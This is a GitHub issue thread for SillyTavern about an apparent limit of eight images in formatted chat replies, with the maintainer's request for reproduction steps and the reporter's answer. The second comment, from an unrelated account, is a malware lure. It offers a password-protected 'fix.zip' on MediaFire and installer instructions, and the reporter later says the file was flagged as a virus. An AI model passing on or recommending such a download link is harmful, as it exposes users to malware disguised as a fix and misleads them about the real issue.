### ISSUE TITLE
[FEATURE_REQUEST] The limit of images in replies

### ISSUE THREAD

**Issue by 1guts1** [SillyTavern/SillyTavern#2714]
### Have you searched for similar requests?

No

### Is your feature request related to a problem? If so, please describe.

According to my observation (which may not be correct), the limit of images in each reply of ST is 8, and additional images will not load, which prevents my HTML and regex design for reply formatting from functioning properly.
Like this
![image](https://github.com/user-attachments/assets/674b0403-4cdb-4c01-8384-43ac354203f8)

### Describe the solution you'd like

Add an option to adjust the image limit in replies, or provide a toggle switch.

### Priority

Medium (Would be very useful)

### Are you willing to test this on staging/unstable branch if this is implemented?

None

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Cohee1207** [comment]
What exactly am I looking at on the attached screenshot?

What do you mean by image limit? Where do these images come from? Can you provide steps to replicate that?

**Comment by 1guts1** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Sorry, the solution you provided has been flagged as a virus by my Windows firewall.

**Comment by 1guts1** [comment]
> What exactly am I looking at on the attached screenshot?
> 
> What do you mean by image limit? Where do these images come from? Can you provide steps to replicate that?

<img width="65" alt="{BB8E9195-F6BA-400c-84DE-29965E619727}" src="https://github.com/user-attachments/assets/341c5491-baf2-48d8-a384-300038d16797">
As described in this image, the ones below like 'C9C' should be output as avatar frames. These images come from the image hosting site I uploaded to. After I modified the replies to HTML format using regex, the system output changes to this chat software format.
